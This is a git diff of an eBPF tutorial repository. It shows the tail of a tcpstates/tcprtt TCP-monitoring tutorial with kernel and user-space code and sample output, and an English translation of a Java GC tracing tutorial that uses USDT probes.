__u16); -} sports SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, __u16); - __type(value, __u16); -} dports SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, struct sock *); - __type(value, __u64); -} timestamps SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); - __uint(key_size, sizeof(__u32)); - __uint(value_size, sizeof(__u32)); -} events SEC(".maps"); - -SEC("tracepoint/sock/inet_sock_set_state") -int handle_set_state(struct trace_event_raw_inet_sock_set_state *ctx) -{ - struct sock *sk = (struct sock *)ctx->skaddr; - __u16 family = ctx->family; - __u16 sport = ctx->sport; - __u16 dport = ctx->dport; - __u64 *tsp, delta_us, ts; - struct event event = {}; - - if (ctx->protocol != IPPROTO_TCP) - return 0; - - if (target_family && target_family != family) - return 0; - - if (filter_by_sport && !bpf_map_lookup_elem(&sports, &sport)) - return 0; - - if (filter_by_dport && !bpf_map_lookup_elem(&dports, &dport)) - return 0; - - tsp = bpf_map_lookup_elem(&timestamps, &sk); - ts = bpf_ktime_get_ns(); - if (!tsp) - delta_us = 0; - else - delta_us = (ts - *tsp) / 1000; - - event.skaddr = (__u64)sk; - event.ts_us = ts / 1000; - event.delta_us = delta_us; - event.pid = bpf_get_current_pid_tgid() >> 32; - event.oldstate = ctx->oldstate; - event.newstate = ctx->newstate; - event.family = family; - event.sport = sport; - event.dport = dport; - bpf_get_current_comm(&event.task, sizeof(event.task)); - - if (family == AF_INET) { - bpf_probe_read_kernel(&event.saddr, sizeof(event.saddr), &sk->__sk_common.skc_rcv_saddr); - bpf_probe_read_kernel(&event.daddr, sizeof(event.daddr), &sk->__sk_common.skc_daddr); - } else { /* family == AF_INET6 */ - bpf_probe_read_kernel(&event.saddr, sizeof(event.saddr), &sk->__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32); - 
bpf_probe_read_kernel(&event.daddr, sizeof(event.daddr), &sk->__sk_common.skc_v6_daddr.in6_u.u6_addr32); - } - bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(event)); - - if (ctx->newstate == TCP_CLOSE) - bpf_map_delete_elem(&timestamps, &sk); - else - bpf_map_update_elem(&timestamps, &sk, &ts, BPF_ANY); - - return 0; -} -``` - -The `tcpstates` program relies on eBPF Tracepoints to capture the state changes of TCP connections, in order to track the time spent in each state of the TCP connection. - -### Define BPF Maps - -In the `tcpstates` program, several BPF Maps are defined, which are the primary way of interaction between the eBPF program and the user-space program. `sports` and `dports` are used to store the source and destination ports for filtering TCP connections; `timestamps` is used to store the timestamps for each TCP connection to calculate the time spent in each state; `events` is a map of type `perf_event`, used to send event data to the user-space. - -### Trace TCP Connection State Changes - -The program defines a function called `handle_set_state`, which is a program of type tracepoint and is mounted on the `sock/inet_sock_set_state` kernel tracepoint. Whenever the TCP connection state changes, this tracepoint is triggered and the `handle_set_state` function is executed. - -In the `handle_set_state` function, it first determines whether the current TCP connection needs to be processed through a series of conditional judgments, then retrieves the previous timestamp of the current connection from the `timestamps` map, and calculates the time spent in the current state. Then, the program places the collected data in an event structure and sends the event to the user-space using the `bpf_perf_event_output` function. - -### Update Timestamps - -Finally, based on the new state of the TCP connection, the program performs different operations: if the new state is TCP_CLOSE, it means the connection has been closed and the program deletes the timestamp of that connection from the `timestamps` map; otherwise, the program updates the timestamp of the connection. - -## User-Space Processing for tcpstate - -The user-space part is mainly about loading the eBPF program using libbpf and receiving event data from the kernel using perf_event: - -```c -static void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) { - char ts[32], saddr[26], daddr[26]; - struct event* e = data; - struct tm* tm; - int family; - time_t t; - - if (emit_timestamp) { - time(&t); - tm = localtime(&t); - strftime(ts, sizeof(ts), "%H:%M:%S", tm); - printf("%8s ", ts); - } - - inet_ntop(e->family, &e->saddr, saddr, sizeof(saddr)); - inet_ntop(e->family, &e->daddr, daddr, sizeof(daddr)); - if (wide_output) { - family = e->family == AF_INET ? 4 : 6; - printf( - "%-16llx %-7d %-16s %-2d %-26s %-5d %-26s %-5d %-11s -> %-11s " - "%.3f\n", - e->skaddr, e->pid, e->task, family, saddr, e->sport, daddr, - e->dport, tcp_states[e->oldstate], tcp_states[e->newstate], - (double)e->delta_us / 1000); - } else { - printf( - "%-16llx %-7d %-10.10s %-15s %-5d %-15s %-5d %-11s -> %-11s %.3f\n", - e->skaddr, e->pid, e->task, saddr, e->sport, daddr, e->dport, - tcp_states[e->oldstate], tcp_states[e->newstate], - (double)e->delta_us / 1000); - } -} -``` - -`handle_event` is a callback function that is called by perf_event. It is invoked whenever a new event arrives from the kernel. - -In the `handle_event` function, we first use the `inet_ntop` function to convert the binary IP address to a human-readable format. Then, based on whether the wide format is needed or not, we print different information.
This information includes the timestamp of the event, source IP address, source port, destination IP address, destination port, old state, new state, and the time spent in the old state. - -This allows users to see the changes in TCP connection states and the duration of each state, helping them diagnose network issues. - -In summary, the user-space part of the processing involves the following steps: - -1. Use libbpf to load and run the eBPF program. -2. Set up a callback function to receive events sent by the kernel. -3. Process the received events, convert them into a human-readable format, and print them. - -The above is the main implementation logic of the user-space part of the `tcpstates` program. Through this chapter, you should have gained a deeper understanding of how to handle kernel events in user space. In the next chapter, we will introduce more knowledge about using eBPF for network monitoring. - -### tcprtt kernel eBPF code - -In this section, we will analyze the kernel BPF code of the `tcprtt` eBPF program. `tcprtt` is a program used to measure TCP Round Trip Time (RTT) and stores the RTT information in a histogram. - -```c -/// @sample {"interval": 1000, "type" : "log2_hist"} -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, u64); - __type(value, struct hist); -} hists SEC(".maps"); - -static struct hist zero; - -SEC("fentry/tcp_rcv_established") -int BPF_PROG(tcp_rcv, struct sock *sk) -{ - const struct inet_sock *inet = (struct inet_sock *)(sk); - struct tcp_sock *ts; - struct hist *histp; - u64 key, slot; - u32 srtt; - - if (targ_sport && targ_sport != inet->inet_sport) - return 0; - if (targ_dport && targ_dport != sk->__sk_common.skc_dport) - return 0; - if (targ_saddr && targ_saddr != inet->inet_saddr) - return 0; - if (targ_daddr && targ_daddr != sk->__sk_common.skc_daddr) - return 0; - - if (targ_laddr_hist) - key = inet->inet_saddr; - else if (targ_raddr_hist) - key = inet->sk.__sk_common.skc_daddr; - else - key = 0; - histp = bpf_map_lookup_or_try_init(&hists, &key, &zero); - if (!histp) - return 0; - ts = (struct tcp_sock *)(sk); - srtt = BPF_CORE_READ(ts, srtt_us) >> 3; - if (targ_ms) - srtt /= 1000U; - slot = log2l(srtt); - if (slot >= MAX_SLOTS) - slot = MAX_SLOTS - 1; - __sync_fetch_and_add(&histp->slots[slot], 1); - if (targ_show_ext) { - __sync_fetch_and_add(&histp->latency, srtt); - __sync_fetch_and_add(&histp->cnt, 1); - } - return 0; -} -``` - -The code above declares a map called `hists`, which is a hash map used to store the histogram data. The `hists` map has a maximum number of entries defined as `MAX_ENTRIES`. - -The function `BPF_PROG(tcp_rcv, struct sock *sk)` is the entry point of the eBPF program for handling the `tcp_rcv_established` event. Within this function, the program retrieves various information from the network socket and checks if filtering conditions are met. Then, it performs operations on the histogram data structure. Finally, the program calculates the slot for the RTT value and updates the histogram accordingly. - -This is the main code logic of the `tcprtt` eBPF program in kernel mode. The eBPF program measures the RTT of TCP connections and maintains a histogram to collect and analyze the RTT data. - -First, we define a hash type eBPF map called `hists`, which is used to store statistics information about RTT. In this map, the key is a 64-bit integer, and the value is a `hist` structure that contains an array to store the count of different RTT intervals.
- -Next, we define an eBPF program called `tcp_rcv` which will be called every time a TCP packet is received in the kernel. In this program, we first filter TCP connections based on filtering conditions (source/destination IP address and port). If the conditions are met, we select the corresponding key (source IP, destination IP, or 0) based on the set parameters, and then look up or initialize the corresponding histogram in the `hists` map. - -Then, we read the `srtt_us` field of the TCP connection, which represents the smoothed RTT value in microseconds. We convert this RTT value to a logarithmic form and store it as a slot in the histogram. - -If the `show_ext` parameter is set, we also increment the RTT value and the counter in the `latency` and `cnt` fields of the histogram. - -With the above processing, we can analyze and track the RTT of each TCP connection to better understand the network performance. - -In summary, the main logic of the `tcprtt` eBPF program includes the following steps: - -1. Filter TCP connections based on filtering conditions. -2. Look up or initialize the corresponding histogram in the `hists` map. -3. Read the `srtt_us` field of the TCP connection, convert it to a logarithmic form, and store it in the histogram. -4. If the `show_ext` parameter is set, increment the RTT value and the counter in the `latency` and `cnt` fields of the histogram. - -`tcprtt` is attached to the kernel's `tcp_rcv_established` function: - -```c -void tcp_rcv_established(struct sock *sk, struct sk_buff *skb); -``` - -This function is the main function in the kernel for processing received TCP data and is called when a TCP connection is in the `ESTABLISHED` state. The processing logic of this function includes a fast path and a slow path. The fast path is disabled in the following cases: - -- We have advertised a zero window - zero window probing can only be handled correctly in the slow path. -- Out-of-order data packets received. -- Expecting to receive urgent data. -- No remaining buffer space. -- Received unexpected TCP flags/window values/header lengths (detected by checking TCP header against the expected flags). -- Data is being transmitted in both directions. The fast path only supports pure senders or pure receivers (meaning the sequence number or acknowledgement value must remain unchanged). -- Received unexpected TCP options. - -When these conditions are not met, it enters a standard receive processing, which follows RFC 793 to handle all cases. The first three cases can be ensured by setting the correct expected flags, while the remaining cases require inline checks. When everything is normal, the fast processing path is invoked in the `tcp_data_queue` function. - -## Compilation and Execution - -For `tcpstates`, you can compile and run the libbpf application with the following command: - -```console -$ make -... - BPF .output/tcpstates.bpf.o - GEN-SKEL .output/tcpstates.skel.h - CC .output/tcpstates.o - BINARY tcpstates -$ sudo ./tcpstates -SKADDR PID COMM LADDR LPORT RADDR RPORT OLDSTATE -> NEWSTATE MS -ffff9bf61bb62bc0 164978 node 192.168.88.15 0 52.178.17.2 443 CLOSE -> SYN_SENT 0.000 -ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 SYN_SENT -> ESTABLISHED 225.794 
-"ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 ESTABLISHED -> CLOSE_WAIT 901.454 -ffff9bf61bb62bc0 164978 node 192.168.88.15 41596 52.178.17.2 443 CLOSE_WAIT -> LAST_ACK 0.793 -ffff9bf61bb62bc0 164978 node 192.168.88.15 41596 52.178.17.2 443 LAST_ACK -> LAST_ACK 0.086 -ffff9bf61bb62bc0 228759 kworker/u6 192.168.88.15 41596 52.178.17.2 443 LAST_ACK -> CLOSE 0.193 -ffff9bf6d8ee88c0 229832 redis-serv 0.0.0.0 6379 0.0.0.0 0 CLOSE -> LISTEN 0.000 -ffff9bf6d8ee88c0 229832 redis-serv 0.0.0.0 6379 0.0.0.0 0 LISTEN -> CLOSE 1.763 -ffff9bf7109d6900 88750 node 127.0.0.1 39755 127.0.0.1 50966 ESTABLISHED -> FIN_WAIT1 0.000 -``` - -For tcprtt, we can use eunomia-bpf to compile and run this example: - -Compile: - -```shell -docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest -``` - -Or - -```console -$ ecc tcprtt.bpf.c tcprtt.h -Compiling bpf object... -Generating export types... -Packing ebpf object and config into package.json... -``` - -Run: - -```console -$ sudo ecli run package.json -h -A simple eBPF program - -Usage: package.json [OPTIONS] - -Options: - --verbose Whether to show libbpf debug information - --targ_laddr_hist Set value of `bool` variable targ_laddr_hist - --targ_raddr_hist Set value of `bool` variable targ_raddr_hist - --targ_show_ext Set value of `bool` variable targ_show_ext - --targ_sport Set value of `__u16` variable targ_sport - --targ_dport Set value of `__u16` variable targ_dport - --targ_saddr Set value of `__u32` variable targ_saddr - --targ_daddr Set value of `__u32` variable targ_daddr - --targ_ms Set value of `bool` variable targ_ms - -h, --help Print help - -V, --version Print version - -Built with eunomia-bpf framework.". -```See https://github.com/eunomia-bpf/eunomia-bpf for more information. - -$ sudo ecli run package.json -key = 0 -latency = 0 -cnt = 0 - - (unit) : count distribution - 0 -> 1 : 0 | | - 2 -> 3 : 0 | | - 4 -> 7 : 0 | | - 8 -> 15 : 0 | | - 16 -> 31 : 0 | | - 32 -> 63 : 0 | | - 64 -> 127 : 0 | | - 128 -> 255 : 0 | | - 256 -> 511 : 0 | | - 512 -> 1023 : 4 |******************** | - 1024 -> 2047 : 1 |***** | - 2048 -> 4095 : 0 | | - 4096 -> 8191 : 8 |****************************************| - -key = 0 -latency = 0 -cnt = 0 - - (unit) : count distribution - 0 -> 1 : 0 | | - 2 -> 3 : 0 | | - 4 -> 7 : 0 | | - 8 -> 15 : 0 | | - 16 -> 31 : 0 | | - 32 -> 63 : 0 | | - 64 -> 127 : 0 | | - 128 -> 255 : 0 | | - 256 -> 511 : 0 | |512 -> 1023 : 11 |*************************** | - 1024 -> 2047 : 1 |** | - 2048 -> 4095 : 0 | | - 4096 -> 8191 : 16 |****************************************| - 8192 -> 16383 : 4 |********** | -``` - -Complete source code: - -- - -References: - -- [tcpstates](https://github.com/iovisor/bcc/blob/master/tools/tcpstates_example.txt) -- [tcprtt](https://github.com/iovisor/bcc/blob/master/tools/tcprtt.py) -- [libbpf-tools/tcpstates]() - -## Summary - -In this eBPF introductory tutorial, we learned how to use the tcpstates and tcprtt eBPF example programs to monitor and analyze the connection states and round-trip time of TCP. We understood the working principles and implementation methods of tcpstates and tcprtt, including how to store data using BPF maps, how to retrieve and process TCP connection information in eBPF programs, and how to parse and display the data collected by eBPF programs in user-space applications. - -If you would like to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. 
The upcoming tutorials will further explore advanced features of eBPF, and we will continue to share more content about eBPF development practices. - -> The original link of this article: diff --git a/src/15-javagc/README.md b/src/15-javagc/README.md index 7dd1e27..1b76e18 100644 --- a/src/15-javagc/README.md +++ b/src/15-javagc/README.md @@ -1,16 +1,16 @@ -# eBPF 入门实践教程十五:使用 USDT 捕获用户态 Java GC 事件耗时 +# eBPF Tutorial by Example 15: Capturing User-Space Java GC Duration Using USDT -eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。这个特性使得 eBPF 能够提供极高的灵活性和性能,使其在网络和系统性能分析方面具有广泛的应用。此外,eBPF 还支持使用 USDT (用户级静态定义跟踪点) 捕获用户态的应用程序行为。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without the need to restart the kernel or modify the kernel source code. This feature provides eBPF with high flexibility and performance, making it widely applicable in network and system performance analysis. Furthermore, eBPF also supports capturing user-space application behavior using User-Level Statically Defined Tracing (USDT). -在我们的 eBPF 入门实践教程系列的这一篇,我们将介绍如何使用 eBPF 和 USDT 来捕获和分析 Java 的垃圾回收 (GC) 事件的耗时。 +In this article of our eBPF Tutorial by Example series, we will explore how to use eBPF and USDT to capture and analyze the duration of Java garbage collection (GC) events. -## USDT 介绍 +## Introduction to USDT -USDT 是一种在应用程序中插入静态跟踪点的机制,它允许开发者在程序的关键位置插入可用于调试和性能分析的探针。这些探针可以在运行时被 DTrace、SystemTap 或 eBPF 等工具动态激活,从而在不重启应用程序或更改程序代码的情况下,获取程序的内部状态和性能指标。USDT 在很多开源软件,如 MySQL、PostgreSQL、Ruby、Python 和 Node.js 等都有广泛的应用。 +USDT is a mechanism for inserting static tracepoints into applications, allowing developers to insert probes at critical points in the program for debugging and performance analysis purposes. These probes can be dynamically activated at runtime by tools such as DTrace, SystemTap, or eBPF, allowing access to the program's internal state and performance metrics without the need to restart the application or modify the program code. USDT is widely used in many open-source software applications such as MySQL, PostgreSQL, Ruby, Python, and Node.js. -### 用户层面的追踪机制:用户级动态跟踪和 USDT +### User-Level Tracing Mechanism: User-Level Dynamic Tracing and USDT -在用户层面进行动态跟踪,即用户级动态跟踪(User-Level Dynamic Tracing)允许我们对任何用户级别的代码进行插桩。比如,我们可以通过在 MySQL 服务器的 `dispatch_command()` 函数上进行插桩,来跟踪服务器的查询请求: +User-Level Dynamic Tracing allows us to instrument any user-level code by placing probes. For example, we can trace query requests in a MySQL server by placing a probe on the `dispatch_command()` function: ```bash # ./uprobe 'p:cmd /opt/bin/mysqld:_Z16dispatch_command19enum_server_commandP3THDPcj +0(%dx):string' @@ -20,9 +20,9 @@ Tracing uprobe cmd (p:cmd /opt/bin/mysqld:0x2dbd40 +0(%dx):string). Ctrl-C to en [...] ``` -这里我们使用了 `uprobe` 工具,它利用了 Linux 的内置功能:ftrace(跟踪器)和 uprobes(用户级动态跟踪,需要较新的 Linux 版本,例如 4.0 左右)。其他的跟踪器,如 perf_events 和 SystemTap,也可以实现此功能。 +Here, we use the `uprobe` tool, which leverages Linux's built-in functionalities: ftrace (tracing framework) and uprobes (User-Level Dynamic Tracing, requires a relatively new Linux version, around 4.0 or later). Other tracing frameworks such as perf_events and SystemTap can also achieve this functionality. -许多其他的 MySQL 函数也可以被跟踪以获取更多的信息。我们可以列出和计算这些函数的数量: +Many other MySQL functions can be traced to obtain more information. 
We can list and count the number of these functions: ```bash # ./uprobe -l /opt/bin/mysqld | more account_hash_get_key add_collation add_compiled_collation add_plugin_noargs adjust_time_range [...] # ./uprobe -l /opt/bin/mysqld | wc -l 21809 ``` -这有 21,000 个函数。我们也可以跟踪库函数,甚至是单个的指令偏移。 +There are 21,000 functions here. We can also trace library functions or even individual instruction offsets. -用户级动态跟踪的能力是非常强大的,它可以解决无数的问题。然而,使用它也有一些困难:需要确定需要跟踪的代码,处理函数参数,以及应对代码的更改。 +User-Level Dynamic Tracing capability is very powerful and can solve numerous problems. However, using it also has some challenges: identifying the code to trace, handling function parameters, and dealing with code modifications. -用户级静态定义跟踪(User-level Statically Defined Tracing, USDT)则可以在某种程度上解决这些问题。USDT 探针(或者称为用户级 "marker")是开发者在代码的关键位置插入的跟踪宏,提供稳定且已经过文档说明的 API。这使得跟踪工作变得更加简单。 +User-Level Statically Defined Tracing (USDT) can address some of these challenges. USDT probes (or "markers" at the user level) are trace macros inserted at critical positions in the code, providing a stable and well-documented API. This makes the tracing work simpler. -使用 USDT,我们可以简单地跟踪一个名为 `mysql:query__start` 的探针,而不是去跟踪那个名为 `_Z16dispatch_command19enum_server_commandP3THDPcj` 的 C++ 符号,也就是 `dispatch_command()` 函数。当然,我们仍然可以在需要的时候去跟踪 `dispatch_command()` 以及其他 21,000 个 mysqld 函数,但只有当 USDT 探针无法解决问题的时候我们才需要这么做。 +With USDT, we can easily trace a probe called `mysql:query__start` instead of tracing the C++ symbol `_Z16dispatch_command19enum_server_commandP3THDPcj`, which is the `dispatch_command()` function. Of course, we can still trace `dispatch_command()` and the other 21,000 mysqld functions when needed, but only when USDT probes cannot solve the problem. -在 Linux 中的 USDT,无论是哪种形式的静态跟踪点,其实都已经存在了几十年。它最近由于 Sun 的 DTrace 工具的流行而再次受到关注,这使得许多常见的应用程序,包括 MySQL、PostgreSQL、Node.js、Java 等都加入了 USDT。SystemTap 则开发了一种可以消费这些 DTrace 探针的方式。 +In Linux, USDT (User Statically Defined Tracing) has actually existed in various forms for decades. It has recently gained attention again due to the popularity of Sun's DTrace tool, which has led to many common applications, including MySQL, PostgreSQL, Node.js, Java, etc., adding USDT support. SystemTap has developed a way to consume these DTrace probes. - -你可能正在运行一个已经包含了 USDT 探针的 Linux 应用程序,或者可能需要重新编译(通常是 --enable-dtrace)。你可以使用 `readelf` 来进行检查,例如对于 Node.js: +You may be running a Linux application that already includes USDT probes, or you may need to recompile it (usually with --enable-dtrace). You can use `readelf` to check, for example, for Node.js: ```bash # readelf -n node @@ -67,23 +65,23 @@ Notes at offset 0x00c43058 with length 0x00000494: [...] ``` -这就是使用 --enable-dtrace 重新编译的 node,以及安装了提供 "dtrace" 功能来构建 USDT 支持的 systemtap-sdt-dev 包。这里显示了两个探针:node:gc__start(开始进行垃圾回收)和 node:http__client__request。 +This is a Node.js recompiled with --enable-dtrace and installed with the systemtap-sdt-dev package that provides "dtrace" functionality to support USDT. Two probes are shown here: node:gc__start (garbage collection start) and node:http__client__request. -在这一点上,你可以使用 SystemTap 或者 LTTng 来跟踪这些探针。然而,内置的 Linux 跟踪器,比如 ftrace 和 perf_events,目前还无法做到这一点(尽管 perf_events 的支持正在开发中)。 +At this point, you can use SystemTap or LTTng to trace these probes. However, built-in Linux tracers like ftrace and perf_events currently cannot do this (although perf_events support is under development). A minimal example of how such a probe is embedded in an application is sketched below.
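+To make the mechanism concrete, here is a small, hypothetical C program that embeds its own USDT markers via the `<sys/sdt.h>` macros shipped in the systemtap-sdt-dev package; the provider and probe names (`myapp:query__start`, `myapp:query__end`) are invented purely for illustration:
+
+```c
+/* Hypothetical app with hand-placed USDT markers.
+ * Build: gcc -o myapp myapp.c (needs systemtap-sdt-dev for sys/sdt.h). */
+#include <sys/sdt.h>
+#include <unistd.h>
+
+static void handle_query(long id)
+{
+    /* provider "myapp", probe "query__start", one argument */
+    DTRACE_PROBE1(myapp, query__start, id);
+    usleep(1000); /* stand-in for real work */
+    DTRACE_PROBE1(myapp, query__end, id);
+}
+
+int main(void)
+{
+    for (long id = 0; ; id++) {
+        handle_query(id);
+        sleep(1);
+    }
+    return 0;
+}
+```
+
+After compiling, `readelf -n myapp` should list both probes as `stapsdt` notes in the same format as the Node.js output above, and an eBPF loader can attach to them with `bpf_program__attach_usdt`, just as the `javagc` example below does with the `hotspot` probes.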
-USDT 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF 程序,和内核态的 eBPF 兼容,避免了内核态和用户态之间的上下文切换,从而提高了 eBPF 程序的执行效率。对于 uprobe 而言,bpftime 的性能开销比 kernel 小一个数量级。 +## Introduction to Java GC -## Java GC 介绍 +Java, as a high-level programming language, has automatic garbage collection (GC) as one of its core features. The goal of Java GC is to automatically reclaim memory space that is no longer used by the program, thereby relieving programmers of the burden of memory management. However, the GC process may cause application pauses, which can impact program performance and response time. Therefore, monitoring and analyzing Java GC events are essential for understanding and optimizing the performance of Java applications. -Java 作为一种高级编程语言,其自动垃圾回收(GC)是其核心特性之一。Java GC 的目标是自动地回收那些不再被程序使用的内存空间,从而减轻程序员在内存管理方面的负担。然而,GC 过程可能会引发应用程序的停顿,对程序的性能和响应时间产生影响。因此,对 Java GC 事件进行监控和分析,对于理解和优化 Java 应用的性能是非常重要的。 +In the following tutorial, we will demonstrate how to use eBPF and USDT to monitor and analyze the duration of Java GC events. We hope this content will be helpful to you in your work with eBPF for application performance analysis. -在接下来的教程中,我们将演示如何使用 eBPF 和 USDT 来监控和分析 Java GC 事件的耗时,希望这些内容对你在使用 eBPF 进行应用性能分析方面的工作有所帮助。 +Running USDT probes in the kernel-mode eBPF runtime can also incur a relatively large performance overhead. In this case, you can consider using a user-mode eBPF runtime such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user-mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user space, is compatible with kernel-mode eBPF, and avoids the context switches between kernel and user mode, thereby improving the execution efficiency of eBPF programs. For uprobes, bpftime's performance overhead is an order of magnitude lower than the kernel's. -## eBPF 实现机制 +## eBPF Implementation Mechanism -Java GC 的 eBPF 程序分为内核态和用户态两部分,我们会分别介绍这两部分的实现机制。 +The eBPF program for Java GC is divided into two parts: kernel space and user space. We will introduce the implementation mechanisms of these two parts separately. -### 内核态程序 +### Kernel Space Program ```c /* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ /* Copyright (c) 2022 Chen Tao */ #include <vmlinux.h> #include <bpf/bpf_helpers.h> #include <bpf/bpf_tracing.h> #include <bpf/usdt.bpf.h> #include "javagc.h" struct { __uint(type, BPF_MAP_TYPE_HASH); __uint(max_entries, 100); __type(key, uint32_t); __type(value, struct data_t); } data_map SEC(".maps"); @@ -102,7 +100,7 @@ } data_map SEC(".maps"); struct { __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); __type(key, int); __type(value, int); } perf_map SEC(".maps"); @@ -169,28 +167,26 @@ int handle_mem_pool_gc_end(struct pt_regs *ctx) char LICENSE[] SEC("license") = "Dual BSD/GPL"; ``` -首先,我们定义了两个映射(map): +First, we define two maps: -- `data_map`:这个 hashmap 存储每个进程 ID 的垃圾收集开始时间。`data_t` 结构体包含进程 ID、CPU ID 和时间戳。 -- `perf_map`:这是一个 perf event array,用于将数据发送回用户态程序。 +- `data_map`: This hashmap stores the start time of garbage collection for each process ID. The `data_t` structure contains the process ID, CPU ID, and timestamp. +- `perf_map`: This is a perf event array used to send data back to the user-space program. -然后,我们有四个处理函数:`gc_start`、`gc_end` 和两个 USDT 处理函数 `handle_mem_pool_gc_start` 和 `handle_mem_pool_gc_end`。这些函数都用 BPF 的 `SEC("usdt")` 宏注解,以便在 Java 进程中捕获到与垃圾收集相关的 USDT 事件。 +Then, we have four handler functions: `gc_start`, `gc_end`, and two USDT handler functions `handle_mem_pool_gc_start` and `handle_mem_pool_gc_end`. These functions are all annotated with the BPF `SEC("usdt")` macro to capture USDT events related to garbage collection in a Java process. -`gc_start` 函数在垃圾收集开始时被调用。它首先获取当前的 CPU ID、进程 ID 和时间戳,然后将这些数据存入 `data_map`。 +The `gc_start` function is called when garbage collection starts.
It first gets the current CPU ID, process ID, and timestamp, and then stores this data in `data_map`. -`gc_end` 函数在垃圾收集结束时被调用。它执行与 `gc_start` 类似的操作,但是它还从 `data_map` 中检索开始时间,并计算垃圾收集的持续时间。如果持续时间超过了设定的阈值(变量 `time`),那么它将数据发送回用户态程序。 +The `gc_end` function is called when garbage collection ends. It performs similar operations as `gc_start`, but it also retrieves the start time from `data_map` and calculates the duration of garbage collection. If the duration exceeds a set threshold (`time` variable), it sends the data back to the user-space program. -`handle_gc_start` 和 `handle_gc_end` 是针对垃圾收集开始和结束事件的处理函数,它们分别调用了 `gc_start` 和 `gc_end`。 +`handle_gc_start` and `handle_gc_end` are the handler functions for the garbage collection start and end events; they call `gc_start` and `gc_end` respectively. -`handle_mem_pool_gc_start` 和 `handle_mem_pool_gc_end` 是针对内存池的垃圾收集开始和结束事件的处理函数,它们也分别调用了 `gc_start` 和 `gc_end`。 +`handle_mem_pool_gc_start` and `handle_mem_pool_gc_end` are the handler functions for the memory-pool garbage collection start and end events; they likewise call `gc_start` and `gc_end`. -最后,我们有一个 `LICENSE` 数组,声明了该 BPF 程序的许可证,这是加载 BPF 程序所必需的。 +Finally, we have a `LICENSE` array that declares the license of the BPF program, which is required for loading the BPF program. +### User-space Program -### 用户态程序 +The main goal of the user-space program is to load and run eBPF programs, as well as process data from the kernel-space program. This is achieved through the use of the libbpf library. Here, we are omitting some common code for loading and running eBPF programs and only showing the parts related to USDT (a minimal sketch of the omitted perf-buffer boilerplate is given at the end of this article). -用户态程序的主要目标是加载和运行eBPF程序,以及处理来自内核态程序的数据。它是通过 libbpf 库来完成这些操作的。这里我们省略了一些通用的加载和运行 eBPF 程序的代码,只展示了与 USDT 相关的部分。 - -第一个函数 `get_jvmso_path` 被用来获取运行的Java虚拟机(JVM)的 `libjvm.so` 库的路径。首先,它打开了 `/proc//maps` 文件,该文件包含了进程地址空间的内存映射信息。然后,它在文件中搜索包含 `libjvm.so` 的行,然后复制该行的路径到提供的参数中。 +The first function `get_jvmso_path` is used to obtain the path of the `libjvm.so` library for the running Java Virtual Machine (JVM). First, it opens the `/proc//maps` file, which contains the memory mapping information of the process address space. Then, it searches for the line that contains `libjvm.so` in the file and copies the path of that line to the provided argument. ```c static int get_jvmso_path(char *path) { @@ -222,7 +218,7 @@ } ``` -接下来,我们看到的是将 eBPF 程序(函数 `handle_gc_start` 和 `handle_gc_end`)附加到Java进程的相关USDT探针上。每个程序都通过调用 `bpf_program__attach_usdt` 函数来实现这一点,该函数的参数包括BPF程序、进程ID、二进制路径以及探针的提供者和名称。如果探针挂载成功,`bpf_program__attach_usdt` 将返回一个链接对象,该对象将存储在skeleton的链接成员中。如果挂载失败,程序将打印错误消息并进行清理。 +Next, we see the attachment of the eBPF programs (`handle_gc_start` and `handle_gc_end`) to the relevant USDT probes in the Java process. Each program achieves this by calling the `bpf_program__attach_usdt` function, which takes as parameters the BPF program, the process ID, the binary path, and the provider and name of the probe. If the probe is successfully attached, `bpf_program__attach_usdt` will return a link object, which is stored in the skeleton's link member. If the attachment fails, the program will print an error message and perform cleanup.
```c skel->links.handle_mem_pool_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid, binary_path, "hotspot", "mem__pool__gc__begin", NULL); @@ -242,7 +238,7 @@ static int get_jvmso_path(char *path) } skel->links.handle_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid, binary_path, "hotspot", "gc__begin", NULL); if (!skel->links.handle_gc_start) { err = errno; fprintf(stderr, "attach usdt gc__begin failed: %s\n", strerror(err)); goto cleanup; @@ -258,7 +254,7 @@ static int get_jvmso_path(char *path) } ``` -最后一个函数 `handle_event` 是一个回调函数,用于处理从perf event array收到的数据。这个函数会被 perf event array 触发,并在每次接收到新的事件时调用。函数首先将数据转换为 `data_t` 结构体,然后将当前时间格式化为字符串,并打印出事件的时间戳、CPU ID、进程 ID,以及垃圾回收的持续时间。 +The last function `handle_event` is a callback function used to handle data received from the perf event array. This function is triggered by the perf event array and is called each time a new event is received. The function first converts the data to a `data_t` structure, then formats the current time as a string, and finally prints the timestamp, CPU ID, process ID, and duration of the garbage collection. ```c static void handle_event(void *ctx, int cpu, void *data, __u32 data_sz) @@ -275,25 +271,25 @@ static void 